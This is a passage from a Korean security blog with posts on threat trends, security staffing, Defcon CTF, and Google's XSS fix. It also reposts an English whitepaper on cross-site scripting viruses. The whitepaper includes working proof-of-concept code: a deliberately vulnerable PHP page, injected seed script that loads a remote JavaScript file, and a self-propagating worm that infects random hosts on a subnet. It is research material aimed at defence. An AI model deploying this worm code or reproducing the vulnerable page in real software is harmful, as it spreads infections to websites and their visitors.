http://www.securitymap.net/sdm/docs/virus/Zeroday-worm.pdf

 

 

 

위와 같이 요약이 됩니다.

 

또한 향후 발생할 위협을 정리 해보면 다음과 같이 정리가 됩니다.

 

향후 지속될 위협

 

* 오래전 부터 언급한 기반시설의 IP 전환 및 온라인 노출이 많아 짐으로 인한 위협의 현실화 ( 기반시설의 위협에 관한 문서를 참고 하시면 됩니다.)

너무 빨리 문제제기를 한 면이 있지만 향후 지속적으로  일반화 될 것으로 예상 됩니다.

http://www.securitymap.net/sdm/docs/attack/internetcrisis_conspiracy%20.pdf

http://www.securitymap.net/sdm/docs/general/Critical_Alert_for_Cyber_Terror.pdf

 

* 무선 및 WiBro , DMB의 활성화를 통한 웜 전파

( IP 기반의 모든 머신에 해당이 될 것이며 이 경우에는 프로토콜 간의 Gateway의 보안설정 이나 허용 조건에 따라 보다 많은 편리성을 제공할 경우 광범위하게 전파가 될 것으로 판단됩니다. )

 

* 보안 인력의 부재 지속

( 전문성이 지속적으로 떨어지고 있는 현실에서 각 영역을 종합적으로 대처할 수 있는 보안 인력은 수요는 급증하나 인력은 계속 부재한 상황이 지속 될 것입니다. )

 

시스템 , Application , 네트워크 , 종합적인 대응 , 보안 체계 수립 이 모든 분야를 컨트롤 할 수 있는 마스터급의 보안 인력은 향후 매우 부족하게 될 것으로 판단 됩니다. 또한 Penetration Test의 영역이 매우 확장이 되어 상당히 많은 부분을 커버하게 될 것으로 예상이 됩니다.  물론 수요도 많이 있을테지만 국내의 현실상 오랜기간 숙달된 인력이나 전문성을 유지하고 있는 인력의 부재로 힘겨운 상태가 지속이 될 것 같네요. 협상력만 잘 보완 한다면 적절한 전문성을 유지한 인력의 경우 상당히 좋은 대우를 받을 수도 있을 것 같습니다.

 

* Application 취약성 발견 지속 및 클라이언트 공격 , 피싱 공격을 통한 이익 추구 일반화

( 올해도 지속이 되었듯이 향후에도 지속이 될 가능성이 높습니다. 또한 신규 프로토콜 상의 문제를 이용한 새로운 유형의 공격들이 나올 가능성이 높다고 판단됩니다. 특히 무선 관련된 802.X 대역에 대한 문제 출현 가능성이 높습니다. )

 

* Bot Network의 복잡화 및 일반화

( Bot 공격의 복잡성은 향후 지속적으로 증가 될 것이고 말 그대로 MonsterBot으로의 진화가 진행 중이며 더욱 심화 될 것으로 판단됩니다. 또한 일반적으로 알려지는 고유명사화 될 정도로 피해를 입힐 수 있을 것 입니다.)

 

* 수정 할 수 없는 Application 결함의 증가

( 취약성을 수정하거나 보완의 책임이 없는 공개 소프트웨어 혹은 개발사의 몰락으로 인한 위험성 증가 )

 

위와 같이 예상이 가능합니다.

이에 대한 대응 및 보안 활동으로는 다음과 같은 행위가 이루어 질 수 있습니다.

 

대응 및 보안활동에 따른 현상

 

*Application 개발 프로세스 단계에서의 보안성 검토 일반화

 

*Application 취약성 진단 도구의 활성화

 

*웜의 일반 PC 침투에 따른 PC 보안 강화

( 패치 및 PC 솔루션 회사들 기회가 될 수도..)

 

*바이러스 및 웜 제작의 일반화에 따른 보안의 어려움 따라서 능력이 있는 회사의 경우 자체 제작이나 변형의 요구에 따른 매뉴얼 보안 툴의 출현 가능성  ( clam 백신처럼...)

 

* 공격에 대응하는 속도를 따라가지 못함으로 인해 지속적인 피해 속출 가능성

 

* 보안 전문 인력의 이탈 가속화

( 노력에 대한 성취도가 매우 낮아 질 것으로 보임.. 노력을 기울여야 하는 부분은 매우 많아 질 것이나 그에 따른 성취도는 낮으며 업무강도 및 피로도는 급증 할 것으로 예상됨 )

 

* 위의 항과는 반대로 보안 인력풀은 산업의 요구에 의해 지속적으로 증가 요청이 있을 것임. 그러나 전반적인 하향 평준화는 어쩔 수 없을 것으로 예상됨.

 

 

기타.

 

*MS 등의 OS 벤더의 기타 사업 진출 가속화

( 보안 및 기타 영리 분야로의 대대적 진출)

 

* 구글등에 의한 Contents 제공 회사의 인프라 점유 확대 및 인프라에 대한 비용이 아닌 컨텐츠 제공에 따른 비용을 청구 받을 가능성 매우 증대

( 이런면에서 구글의 인프라 사업 진출 및 무선망 확대 사업은 매우 중요한 의미를 지님)

 

*손쉬운 IT 기업의 창업이 어려워짐

( 일정 규모 이상의 IT 대기업 출현으로 아이디어를 통한 신규 진출 및 창업이 어려워 질 것이며 인프라 및 보안 분야에 대한 일정 수준 이상의 요구를 맞추어야 함으로 더욱 더 어려워 질 것임. 보안 취약성은 기업의 규모를 가리지 않고 발견이 되고 있으며 일반 Application 발견 비율이 매우 높아 안전한 보안성을 지닌 소프트웨어 설계에는 매우 많은 비용이나 시간이 소요 되고 있음 )

 

* 세계적인 보안 부분 대기업 출현

시만텍 등의 보안 전문 출발 회사 부터 네트워크 부분의 시스코등에 의한 보안 분야 흡수 합병을 통한 거대 기업 출현으로 한 분야의 전문회사는 독창성이나 기술 모방성에 대해 독보적인 영역을 지니지 않는 이상 견디기 힘든 환경 지속될 것임.

 

 

위와 같이 아침에 번뜩 든 생각을 정리해 봤습니다.

짧은 생각이지만 참고 하시고 좋은 의견 있으시면 붙여 주세요.

감사합니다.

 

 

보안 전문가에게 듣는 해킹 프로화에 대한 대처 - 아래 글을 읽다 보니 문득 생각이 나서 써봤습니다.

 

http://www.zdnet.co.kr/itbiz/reports/trend/0,39034651,39134824,00.htm

 

딱 부러지는 답변은 없습니다. 그나마 간략한 발전 방향 및 향후 증가되는 유형에 대한 설명만 있을뿐.. 참고 삼아 읽어 보시면 될 것 같습니다.

 

Posted by 바다란

댓글을 달아 주세요

http://news.naver.com/news/read.php?mode=LSS2D&office_id=092&article_id=0000007823&section_id=105&section_id2=283&menu_id=105

 

다 알고 있는 사실들이지만 공개적으로 언급을 해보자.

 

대부분의 관리자는 어떻게 하면 내부 네트워크를 안전하게 지키고 보호 할 수 있는지에 대해서 알고 있다. 그리고 내부 네트워크를 지키기 위해서라면 내부의 구성에 대해서 철저하게 알고 있어서 문제점 및 취약 부분에 대해서 분명한 이해를 하고 있어야 된다.

그러나 기업의 네트워크망은 발전을 하는한 계속 확장되기 마련이고 현재와 같은 전자금융 및 전자거래의 증가 , 인터넷 비즈니스의 확장에 따라 확장은 필연적이다. 작은 회사의 스위치 몇 대와 한정된 시스템 자원의 운영시에는 관리자의 관리포인트는 작을 수 밖에 없다. 또한 중점 관리 대상도 한정이 될 수 밖에 없다. 이 과정에도 난점이 존재한다.

 

보안 관리자의 기본 요건을 완비하기 위해서는 최소한 IT보안 부분에 한정해서 보았을때 다음과 같은 필요성이 요구된다. 기본전재로 서비스의 구성은 다음과 같이 이루어 진다. 네트워크 인프라 + 시스템 자원 + Application  이외에도 인력에 대한 통제 및 내부 기밀 유출 방지등에 대한 다양한 시각이 있을 수 있으나 여기에서는 IT보안 부분에만 한정하여 보기로 하였으므로 위의 세가지 부분에 대해서 언급을 해보겠다.

 

 

1. 네트워크 보안 지식 - 기본적인 네트워크 단위의 구성과 보안 구성을 위한 안을 고민 할 수 있어야 하고 보다 더 안전하고 내부를 보호할 수 있는 단위를 고민할 지식 및 역량이 있어야 한다.

 

2. 시스템 보안 지식 -  네트워크 장비를 제외한 대부분의 장비가 운영체제가 설치된 시스템들이다. 이 시스템의 운영체제는 독특한 경우를 제외하고는 여러 종류의 운영체제가 설치가 되며 모든 부분에 통달 하지는 않더라도 근본 구성 요소 및 전체적인 지식을 포괄적으로 알고 있어야 하며 몇몇 운영체제에 대해서는 심도 있는 지식이 필요하다. 또한 이러한 지식을 바탕으로 기본 보안 룰 및 보안 정책을 수립 할 수 있어야 한다.

 

3. Application  - 운영체제 위에 올라가는 Application도 다양한 종류가 존재한다. Database solution , Web Solution 등등 이루 말할 수 없는 수많은 종류의 Application이 존재한다. 또한 직접 개발하여 운영중인 웹페이지나 솔루션들도 회사나 서비스의 규모에 따라 매우 많은 종류가 존재하며 동일한 플랫폼을 운영하지 않는 경우에는 다양한 프로그래밍 및 기법이 적용된 수많은 Application이 존재하게 된다. 근래에 더욱 중요하게 여겨지는 부분인데 Application에 대한 공격이 지난해 초 부터 급증을 하는 것이 현실이다. 각 개별 Application들의 문제를 이용한 웜이나 바이러스 그리고 정보를 유출하기 위한 악성코드등이 다수 설치가 되며 내부 기밀정보가 저장된 DB의 권한을 손쉽게 획득하는 등 다수의 위험성이 증가하고 있으며 향후에도 매우 증가할 것으로 예상이 된다. 따라서 보안 관리자에게는 그동안의 네트워크 통제 및 시스템에 대한 지식외에도 다방면의 Application에 대한 지식 및 프로그래밍의 허와 실을 지적할 수 있는 능력이 시급하게 필요한 상황이다.

 

위의 세 가지 외에도 필요한 부분들은 다수가 있을 수 있으나 가장 시급하게 필요한 부분은 위의 세 부분이다. 특히 네트워크 및 시스템 지식을 지닌 보안 관리자들은 다수 있으나 Application에 대한 지식이 없거나 부족한 관리자들이 많아 현재도 상당한 위험에 노출이 되어 있는 상황이며 보안 솔루션으로 해결하기에는 문제의 발생 이후 대응 하는 기간이 짧아 보안 솔루션의 시기 선점이나 연구는 조금씩 대응이 늦어지고 있고 그 간극은 더욱 차별화 될 것으로 보인다.

연구 역량을 지닌 몇몇 거대 기업에 의해 선점될 이슈로 인해 작은 보안 회사들의 생존은 힘들어 질 것이고 독점에 의한 고가의 제품들로 인해 역량있는 보안전문가 집단을 보유하지 못한 회사들은 많은 비용 부담을 책임질 수 밖에 없을 것으로 판단된다.

 

보안은 결과가 아닌 과정이다.

비지니스의 연속성을 보장하는 필수적인 과정이며 IT가 발달 할 수록 인터넷 문화가 발전 할 수록 더욱 더 필요한 부분이 될 수 밖에 없을 것이다.

 

그렇다면 현재 상태에서의 문제 해결은 무엇이 될까?

관리자가 감당하기에는  벅찬 시스템 및 네트워크의 자원 그리고 공격자들의 빠른 전환과 자동화된 공격 , Application 전체적인 레벨 유지 및 보안상의 문제들 , 대규모 악성코드 및 커널레벨까지 컨트롤 하는 시스템 백도어들의 출현 등등

 

위의 문제들은 규모가 있는 회사 일 수록 더욱 심각하게 다가오는 문제들이다.

기사에서 언급된 방안도 고민할 수 있는 방안이며 현재로서는 유일한 대안이라고도 할 수가 있을 것 같다. 공격자의 입장에서 내부에 문제는 없는지 여러 점검포인트들에 대해서 핵심을 짚고 각 해당 점검 포인트 별로 순차적인 문제 해결을 위한 점검을 실제 공격자의 입장에서 진행을 한다면 드러나는 문제점들에 대해 손쉽게 공격을 당하거나 노출된 취약점들을 지속해서 줄일 수 있을 것이다.

 

IT보안이라는 것이 더욱 중요한 시기이고 문제를 해결 하기 위한 노력도 더욱 증감 되어야 한다. 그러나 현재 상태는 고가의 장비를 도입한다고 하여 점검포인트 전체를 커버 할 수는 없으며 유일한 방안은 점검포인트를 분명히 체크 할 수 있고 명확한 방침을 가지고 운영을 하여야 하며 뛰어난 전문가 집단을 외부에서든 내부에서든 수시로 활용이 가능하여야 한다. 여력이 되는 회사라면 내부에 운영하는 것이 기밀 및 전체적인 보안 수준의 향상에 큰 기여를 할 것이고 그렇지 않은 기업이라면 외부에서 주기적인 점검을 통해 체크를 하여야 한다.

점검포인트 측면에서 아무래도 외부에서 접근을 하는 경우에는 놓치는 곳들이 있을 수 밖에 없으므로 문제는 계속 될 것이지만 드러난 위협을 줄일 수는 있을 것이다.

 

정리하면 다음과 같다.

 

* 점검포인트를 명확하게 규정하고 주된 위협지점을 찾을 수 있는 역량 있는 자의 충원

* 역량 있는 자의 충원 이후에 시스템 및 Application 단위의 문제점을 지적할 수 있는 전문가 집단의 충원 혹은 외부 동원을 통한 상시진단.

* 문제의 수정 및 신속한 보안 대책 수립 및 이행

 

원론적인 이야기 이지만 IT보안에 있어서는 근본적인 대책이며 현재 다수 발생하고 있는 Application 관련 보안 사고 및 문제들을 최소화 할 수 있는 기본 방안이라 할 수 있다. 변화하는 위협에 대처하기 위해서는 전문가 집단의 확보는 필수라고 할 수 있다. 위협은 너무나도 빨리 변화고 수시로 큰 위협으로 돌변함으로 준비하지 않는 기업이나 산업에는 재앙으로 다가 올 수도 있을 것이다.

 

감사합니다.  - p4ssionable security explorer  바다란

 

 

Posted by 바다란

댓글을 달아 주세요

Defcon과 BlackHat은 서로 양립하는 존재입니다.

그리고 동시에 개최가 됩니다.

보안과 해킹은 서로 상극이면서도 가장 밀접한 관계이기에 더욱 그렇습니다.

 

매년 8월쯤에 미국에서 Defcon과 BlackHat 에서 해킹과 보안 관련된 세미나 세션들이 개최가 됩니다.

CTF란 용어는 왠만한 해킹/보안 컨퍼런스에 나가시면 항상 이루어 지는 세션입니다만 정확한 의미는 공격과 방어를 누가 더 잘하는가 입니다.

 

문제점을 찾고 또 그 문제점을 수정하고 방어하고 공격하여 최고의 점수를 획득한 팀이 우승을 하게 되죠.

CTF 세션의 원조는 Defcon이며 세계 최고수의 공격/방어 전문가들이 나타나는 것으로 유명합니다.

그동안 이런 부분에 대해서 소개할 좋은 기회가 없었는데 보안뉴스에서 기획기사로 연재를 하여 소개 하여 드립니다.

 

세계 최대 해킹대회 ‘데프콘 CTF’ 그 현장속으로…①   

http://www.boannews.co.kr/media/view.asp?page=1&gpage=1&idx=3522&search=title&find=&kind=2

 

세계 최대 해킹대회 ‘데프콘 CTF’ 그 현장속으로…②   

http://www.boannews.co.kr/media/view.asp?page=1&gpage=1&idx=3523&search=title&find=&kind=2

 

세계 최대 해킹대회 ‘데프콘 CTF’ 그 현장속으로…③   

http://www.boannews.co.kr/media/view.asp?page=1&gpage=1&idx=3524&search=title&find=&kind=2

 

아시아권역에서는 14회 대회동안 본선진출팀 조차 여지껏 없었습니다.

이번에 최초 본선진출에 6위를 하였네요. 준비도 많이 못하고 장비도 열악한 상황에서  본선진출 8개팀중 한국을 제외하고는 십여명 단위였는데 한국팀은 핵심멤버도 비자문제로 못간 상황인 환경에서 이뤄낸 결과라  매우 값진 결과라고 생각 합니다.

 

우물안에서 안주하고 서로를 비난하고 기를 죽이고 할때 세계 무대에서는 보다 더 나아가기 위한 활발한 토론 및 연구가 이루어 지고 있습니다. 보안과 해킹은 모순되지만 가장 가까운 부분이며 출발지는 서로 달라도 한번 돌고나면 같은 지점에 있을 수 밖에 없는 뫼비우스의 띠와 같은 분야 입니다.

 

해킹을 못하면서 보안을 한다는 것과 보안을 한다면서 해킹이 어떤 유형으로 발생 하는지에 대해서 이해를 못한다면 지금과 같은 글로벌 비즈니스 산업 특히 국경이 없는 인터넷 분야에서는 치명적으로 낙오 될 수 밖에 없습니다. 글로벌 기업에 대해서는 더더욱 심각한 문제가 됩니다. 어떠한 목적으로 이용하느냐에 따라 크래킹과 해킹으로 구분 할 수 있지만 CTF와 같은 세션은 해킹이며 더더욱 발전을 위한 해킹이 됩니다.

 

지금껏 국내에서는 크래킹과 해킹의 구분없이 무작위적인 단속 강화로 인해 많은 인력들이 사장 되고 분야를 등졌지만 나비효과처럼 피해가 극대화 되는 시점에서는 잃어버린 지식을 찾기에는 매우 어려울 것입니다. 전반적인 인력의 양성과 분야에 대한 긍정적인 지원 효과가 있을때 인터넷 산업의 국제화도 활발해 질 것입니다.

 

국내 게임 산업에 대해 중국 크래커들이 무작위로 공격을 시행 하고 있습니다. 그러나 그들을 처벌 할 방안은 존재 하지 않고  전문화되고 깊이 있는 공격을 막기 위해서는 분석이 필수적이며 공격자의 의도와 기법을 분석할만큼의 능력을 지니고 있어야 합니다.  

공격자의 관점에서 바라보는 것도 대응에 매우 중요한 부분입니다.

이런 부분을 제대로 할 인력이 부족했고 인식이 부족 했었기에 지금까지도 피해가 지속이 되는 것이며 해외 진출 기업들에게도 [특히 인터넷기업] 치명적인 영향을 미치고 있습니다. 각 국가마다 개인정보보호의 영향이 매우 크게 작용하고 있는 국제 비지니스 환경의 변화도 큰 부담이 됩니다.

 

조그마한 취약점을 통해 사용자 정보가 유출 되었을 경우 국가마다 차이는 있으나 심한 경우는 사업에 중대한 Risk가 되고 있는 상황입니다.

무엇이 중요한 부분일까요? 조금만 더 멀리 보았다면 지금과 같지는 않을텐데.. 하는 생각 많이 듭니다.

그 시대의 나름대로 이유와 당위성은 있었겠으나  잡초제거를 한다고 논을 갈아 엎은 모양새가 되어 있습니다.

부족하나마 이제라도 힘을 모으고 긍정적인 전환을 통해 Global Business 환경에 대응하는 것이 필요할 때는 아닌지...

 

긍정의 힘을 믿는 긍정적인 자세가 필요했는데 사회 전반적으로 그런 분위기가 부족한 것은 아닌지하는 생각도.. ^^;

 

11월의 poc2006 기대가 됩니다. 이제는 바뀌고 변화해야 할때.

Posted by 바다란

댓글을 달아 주세요

http://www.zdnet.co.kr/news/internet/hack/0,39031287,39144768,00.htm

 

전체적인 기관의 보안 대응 및 사고 발생시의 프로세스를 점검 하기 위한 cyber storm 프로젝트가 1주일간에 걸쳐 이루어 졌다고 합니다.

 

실제 공격 보다는 공격시의 대응 및 전달 체계 구축에 목표를 둔 것으로 보이고 해당 프로세스에 따라 유기적인 대응 조직 구성에 가장 신경을 쓴 것으로 보이네요.

 

향후 부분적으로 실제 공격 단위의 테스트가 이어질 수 있을 것으로 보입니다.

이 사이버 스톰과 관련하여서는 국내에는 을지훈련이 있으며 보다 더 효과적으로 시행이 되고 있는 것으로 보입니다. 지난 몇 년간의 을지훈련 프로세스를 지켜보면 프로세스 및 연결 체계에 있어서 효율성이 보다 더 나은 것으로 보입니다.

 

상당히 많은 조직과 큰 규모를 움직이기 위해서 필요한 프로세스 점검 차원에서 주목할 필요성은 있을 것 같습니다.

 

Posted by 바다란

댓글을 달아 주세요

안녕하세요. 바다란입니다.

두 가지의 다르자 같은 내용을 지닌 소식입니다.

구글에서 XSS 취약성을 수정 했다는 내용 하나와 XSS가 지니고 있는 추가적인 위험성에 대해서 드러난 paper 입니다. Xss 취약성을 이용한 Virus가 전파 된다면 어떻게 될까요? 또한 특정 사이트나 IP 대역에 대해 Application 차원의 DDOS 가 진행이 된다면 어떻게 될까요?. 생각해 볼만한 .문제인 것 같습니다. Validation check는 언제나 중요합니다. 개발 단위에서부터 서비스의 보안성 점검을 통한 안전한 사이트 오픈 까지 많은 과정이 필요합니다만 앞으로는 이런 과정을 무시할 경우 상당한 어려움에 처할 것 같습니다. XSS 바이러스는 현재 개념차원의 내용이지만 향후에는 상당히 다르게 진화 할 것이고 큰 피해를 입힐 것 같습니다. 지난 해말의 PHP 버그를 이용한 Application wormsanty웜과 같이 어플리케이션 단위에 페이지 변조외에 더욱 직접적인 영향을 미칠 것이라 생각 됩니다.

 

 

구글이 자사 사이트에서 발견된 보안 상의 결함을 수정했다.

보안 연구자들은 결함으로 인해 피싱 사기, 계정 탈취 등의 공격을 받을 우려가 있다고 전했다.
문제를 발견한 보안 업체인 핀잔 소프트웨어(Finjan Software) 따르면 XSS(Cross-Site Scripting 취약성은 구글의 광고 프로그램용 사이트인 애드워즈(AdWords) 고객 트레이닝 사이트에 존재했다.
공격자가 결함을 악용하면 구글의 계정을 탈취하거나 피싱 사기를 일으킬 있다. 사용자의 컴퓨터에 악성 코드가 다운로드 수도 있다.
피싱은 사용자를 속여 아이디(ID), 패스워드, 신용 카드 정보, 주민등록번호 중요한 정보를 가로채는 행위를 말한다.
핀잔은 결함을 지난달 말에 구글에 알렸으며, 구글은 30시간 이내에 결함을 수정했다.
핀잔의 부사장인 리모르 엘바즈(Limor Elbaz)구글의 대응은 매우 좋았다 평가했다.
구글은 자사가조금 경고를 받아 결함을 수정한 것을 인정했다.
구글 관계자는사용자 데이터의 손상은 전혀 없었다. 업계에서 최선으로 여겨지는 방법으로 취약성을 공개한 핀잔에 박수를 보낸다 성명을 발표했다.
보안 문제는 구글 사이트가 인증을 실시하지 않고 있으며, 특정 필드에 여과 없이 데이터를 입력하는 것이 원인이었다. 이러한 경우에는 사용자의 컴퓨터상에서 동작하는 여분의 데이터나 스크립트를 삽입할 있게 된다. 결함을 악용하려면 공격자가 특별한 링크를 준비해 사용자를 속이고 링크된 사이트를 이동시키면 된다.
엘바즈는구글의 사례에서는 링크가 완벽한 구글 링크인 것처럼 보이는 점이 가장 위험했다 전했다.

XSS 결함은 정기적으로 발견되고 있다. 사례는 핀잔이 MS X박스 360 사이트에서 발견했다. 핀잔은 전에도 야후의 기반 전자 메일 서비스에서도 결함을 발견한 적이 있다.
핀잔은 취약점 분석도구 스캐너 기반의 업무 시스템을 보호하는 보안 제품을 판매한다. 핀잔은 인기있는 사이트를 정기적으로 테스트하고 있다.
엘바즈는핀잔은 업체들이 자신들의 사이트를 더욱 안전하게 운영하기를 바라는 입장에서 테스트를 실시하고 있다 말했다.
핀잔은 XSS 결함이 수정되었기 때문에 구글의 사이트는 안전하다고 평가했다.
엘바즈는현재 XSS 취약성을 가진 사이트는 없는 걸로 알고 있다. 핀잔은 사이트의 취약성 문제를 계속해서 주시할 것이다라고 말했다. @

 

 

XSS Virus Whitepaper

------------------------------------------------------------------------

 

 

SUMMARY

 

The following paper explores the new threat of cross-site scripting (XSS) viruses. To date, cross site scripting has never been utilised to generate viruses. These viruses are a new species which are platform independent and not affected by common firewall configurations. XSS viruses could have a significant impact for Internet continuity, including distributed denial of service (DDOS) attacks, SPAM and dissemination of browser exploits.

This is particularly relevant with the increasing sophistication of web browsers and the growing popularity of web based applications such as Wikis and Blogs.

 

DETAILS

 

Introduction:

As an inevitable consequence of expanded web application functionality, security implications on various levels have increased. The appearance of XSS is one such security issue. This vulnerability allows code to be injected into web sites with the aim of being parsed and/or executed by web browsers.

 

Broadly, cross-site scripting can be divided into two areas: permanent and non-permanent. Non-permanent XSS is returned immediately and doesn't remain on the server. Alternatively, permanent XSS will remain on the server and be returned to any browser requesting the injected page. This paper is particularly concerned with the permanent variety of XSS.

 

It is possible to inject self propagating XSS code into a web application and it will spread via client web browsers. This creates a symbiotic relationship between browser and application server. The code will reside on vulnerable web applications and be executed within the client web browser. This relationship is not necessarily one-to-one.

 

Proof of Concept:

The following proof of concept demonstrates a XSS virus. The vulnerable environment created is an example scenario required for XSS viruses and does not show an exhaustive set of possible conditions. It illustrates permanent XSS within a web application. In this case, the vulnerability is exploitable via a get request, which allows a trivial virus to be created.

 

Initially an instance of the vulnerable web application will be seeded with the self-propagating code. When this code is executed by web browsers, it results in their infection. The infected web browsers connect to random sites and perform the exploiting get request. The injected code will, in turn, infect further vulnerable web applications with the self-propagating code.

 

The following crafted permanent XSS exploitable PHP page can be infected with a virus. The page accepts a parameter (param) value and writes it to a file (file.txt). This file is then returned in the request to the browser. The file will contain the previous value of the "param"

parameter. If no parameter is passed it will display the file without updating it.

 

Web Application: index.php

 

<?php

  $p=$HTTP_GET_VARS[ param ];

  $filename =  ./file.txt ;

 

  if ($p !=   ) {

    $handle=fopen($filename,  wb );

    fputs($handle, $p);

    fclose($handle);

  }

 

  $handle = fopen($filename,  r );

  $contents = fread($handle, filesize($filename));

  fclose($handle);

 

  print $contents;

?>

 

This page (index.php) was hosted on multiple virtual servers within a

10.0.0.0/24 subnet. One web application instance was then seeded with the following code which retrieves a JavaScript file and executes it.

Alternatively, it is possible to inject the entire code into the vulnerable applications rather than requesting a JavaScript file. For simplicity, a JavaScript file (xssv.jsp) was requested.

 

Injected Seed Code:

< iframe name="iframex" id="iframex" src="hidden"

style="display:none"></iframe> < script SRC="http://<webserver>/xssv.js"></script>

 

The JavaScript file that was requested in the example is shown below. Its self-propagation uses an iframe which is periodically reloaded using the

loadIframe() function. The target site IP address of the iframe is selected randomly within the 10.0.0.0/24 subnet via the function get_random_ip(). The XSS virus uses a combination of these two functions and the continual periodic invocation using the setInterval() function.

 

Javascipt: xssv.jsp

 

function loadIframe(iframeName, url) {

  if ( window.frames[iframeName] ) {

    window.frames[iframeName].location = url;

    return false;

  }

  else return true;

}

 

function do_request() {

  var ip = get_random_ip();

  var exploit_string = '< iframe name="iframe2" id="iframe2" src="hidden"

style="display:none"></iframe> < script SRC="http://<webserver>/xssv.js"></script>';

 

  loadIframe('iframe2', "http://" + ip + "/index.php?param=" + exploit_string); }

 

function get_random()

{

  var ranNum= Math.round(Math.random()*255);

  return ranNum;

}

 

function get_random_ip()

{

  return "10.0.0."+get_random();

}

 

setInterval("do_request()", 10000);

 

Viewing the seeded web application caused the browser to infect other web applications within the 10.0.0.0/24 subnet. This infection continued until some, but not all, applications were infected. At this point the browser was manually stopped. Another browser was then used to view one of the newly infected web applications. The virus then continued to infect the remaining uninfected web applications within the subnet.

 

This proof of concept shows that under controlled conditions, not dissimilar to a real world environment, a XSS virus can be self-propagating and infectious.

 

Conventional Virus Differences:

Conventional viruses reside and execute on the same system. XSS viruses separate these two requirements in a symbiotic relationship between the server and the browser. The execution occurs on the client browser and the code resides on the server.

 

Platform indiscrimination also differentiates a XSS virus from its conventional counterparts. This is due to the encapsulation within HTML and the HTTP/HTTPS protocol. These standards are supported on most web browsers running on a variety of operating systems, making cross-site scripting viruses platform independent. This platform independence increases the number of potential web applications that can be infected.

 

Infection:

Cross-site scripting virus infection occurs in two stages and usually on at least two devices. As such, there are two kinds of infections that work symbiotically.

 

The server is infected with persistent self-propagating code that it doesn't execute. The second stage is browser infection. The injected code is loaded from the site into the non-persistent web browser and executed.

The execution then seeks new servers to be exploited and potentially executes its payload. Typically, there will be one infected server to many infected browsers.

 

Payload:

Like conventional viruses, XSS viruses are capable of delivering payloads.

The payloads will be executed in the browser and have the restriction of HTML compliant code. That is, the payload can perform HTML functions, including JavaScript.

 

Whilst this does pose limitations, XSS viruses are still capable of malicious activity. For example, the payload could deliver a DDOS attack, display SPAM or contain browser exploits. Future payload capability is likely to be greater due to increasing browser sophistication.

 

Disinfection:

The relationship between the server and one browser can be broken by simply shutting down the browser. However, there is currently no means to prevent browser re-infection other than disabling browser functionality.

 

Potential disinfection methods will involve the referrer field from the request header. This is due to the fact that the referrer is likely to be logged on web servers where infection has been attempted. Thus, where referrer spoofing hasn't occurred, following the log files will reveal a trail back to the source of the virus.

 

Prevention:

A common initial preventative to viral infection is a network level firewall. As HTTP/HTTPS protocols are afforded un-vetted access through common firewall configurations, these firewall barriers are ineffectual. A potential remedy to this is an application firewall with the appropriate XSS virus signatures.

 

Whilst unlikely, the most obvious way to prevent XSS viruses is to remove XSS vulnerabilities from web applications. Another method is for browsers to enforce a request restriction on a web page's sub-elements. The restriction would only allow sub-elements to be requested from the main URL's domain. Thus, preventing XSS viruses from infecting other web applications.

 

Conclusion:

The infectious nature of XSS viruses has been demonstrated within a controlled environment. It was achieved through a purposely crafted vulnerable web application distributed across a subnet. This environment was subsequently infected.

 

XSS viruses are a new species. They distinguish themselves from their conventional cousins through the requirement for a server-client symbiotic relationship and their platform independence. These differences have both positive and negative influences on the virulence of infection.

 

This paper illustrates that XSS viruses are platform independent and capable of carrying out malicious functions. Whilst there are mitigating factors, these points coupled with the increasing sophistication of web browsers show the threat of XSS viruses. Proactive measures need to be taken in order to combat this threat, before XSS viruses become endemic.

 

References:

[1] Remote Scripting with IFRAMEs -

<http://developer.apple.com/internet/webcontent/iframe.html>

http://developer.apple.com/internet/webcontent/iframe.html

[2] HTML Code Injection and Cross-site scripting - <http://www.technicalinfo.net/papers/CSS.html>

http://www.technicalinfo.net/papers/CSS.html

[3] JavaScript: Random Scripts -

<http://www.pageresource.com/jscript/jrandom.htm>

http://www.pageresource.com/jscript/jrandom.htm

[4] Mozilla Foundation Security Advisory 2005-58 - <http://www.mozilla.org/security/announce/mfsa2005-58.html#xmlhttp>

http://www.mozilla.org/security/announce/mfsa2005-58.html#xmlhttp

[5] PHP Manual -  <http://www.php.net> http://www.php.net [6] Scripting Iframes - Tutorial and Examples - <http://www.dyn-web.com/dhtml/iframes/>

http://www.dyn-web.com/dhtml/iframes/

[7] CGISecurity's Cross Site Scripting FAQ - <http://www.cgisecurity.com/articles/xss-faq.shtml>

http://www.cgisecurity.com/articles/xss-faq.shtml

 

 

ADDITIONAL INFORMATION

 

The information has been provided by  <mailto:wade@bindshell.net> Wade Alcorn.

The original article can be found at: 

<http://www.bindshell.net/papers/xssv.html>

http://www.bindshell.net/papers/xssv.html

 

 

 

 

Posted by 바다란

댓글을 달아 주세요

http://www.securityfocus.com/news/11405

 

SPI Dynamic의 Hoffman이 지금 라스베거스에서 열리고 있는 BlackHat에서 스크립트를 이용한 공격과 웹 Application을 통한 웜에 대해서 언급을 하였다고 한다. 기사뿐 아니라 실제 발표된 스크립트 문서를 확인해 본 결과 특별하거나 새로운 이슈는 아니라고 판단되며 현재 나온 상황의 종합판이라 할 수 있을 것 같다.

 

이미 2004년말에 출현한 Santy worm을 보며 향후 방향이 어플리케이션으로 넘어감을 예상 할 수 있었는데 앞으로는 더욱 더 심각할 수 있다는 생각을 한다.

 

그 당시에 작성한 문서도 일정부분 참고가 될 수 있을 것이다.

http://blog.naver.com/p4ssion/50001891757

 

Ajax는 사용자의 PC와 사용자의 Client에 많은 기능을 부여하여 원활한 자유도를 확보하는 기법이다. 이 기법의 기본은 Script 베이스로 이루어진다. DOM과 Script간의 비동기적인 통신을 이용하여 유기적인 연결이 되는 것으로 묘사하는 기법이라 할 수 있는데 클라이언트에 자유도를 증가 시킬 수록 문제 심각도는 커질 것임은 명백하다.

 

Myspace의 경우에도 Yahoo Messenger의 경우에도 일반적인 총칭으로 Ajax 라 부를 수 있는데 이런 기능을 직접 활용한 웜의 출현은 지난해 말과 올해들어 충분히 목격을 하였을 것이다.

 

 

마이스페이스를 목표로 한 어플리케이션 웜 과 야후 메신저를 목표로 한 자동 전파 기능을 지닌 코드들의 특징..그리고 향후 나올 가능성이 존재하는 것들에 대한 위험성에는 특정 기업의 Application 에 대한 공격이 증가 할 것이고 온라인화 되는 문화가 한국 내에서는 상당부분 빠르게 발전되어 문제들도 빨리 나타났으나 해외의 경우에는 이제 부터 더욱 더 본격화 될 것이라 본다.

 

이슈의 경우에도 향후 해외에서 적극적인 이슈들이 나올 수 있을 것이다.

 

